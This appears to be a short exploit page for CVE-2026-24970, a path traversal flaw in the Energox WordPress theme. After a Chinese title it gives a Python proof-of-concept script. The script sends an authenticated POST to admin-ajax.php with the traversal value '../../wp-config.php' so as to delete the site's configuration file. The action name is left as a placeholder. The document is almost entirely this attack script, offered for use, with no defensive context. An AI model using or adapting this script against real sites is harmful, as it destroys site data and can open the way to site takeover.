CVE-2026-24970 Energox主题路径遍历漏洞

import requests # Exploit Title: Energox Theme Path Traversal / Arbitrary File Deletion # CVE: CVE-2026-24970 # Description: Exploits path traversal to delete files. target_url = "http://target-site.com/wp-admin/admin-ajax.php" # The specific action and parameter names would depend on the vulnerable theme's code logic # Often involves an action like 'delete_file', 'remove_image', etc. payload = { "action": "vulnerable_theme_action", # Placeholder for actual action "file": "../../wp-config.php" # Path traversal payload } # Authentication is required (PR:L) cookies = { "wordpress_logged_in_...": "session_cookie_here" } try: response = requests.post(target_url, data=payload, cookies=cookies) if response.status_code == 200: print("Request sent. Check if file was deleted.") else: print(f"Failed with status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")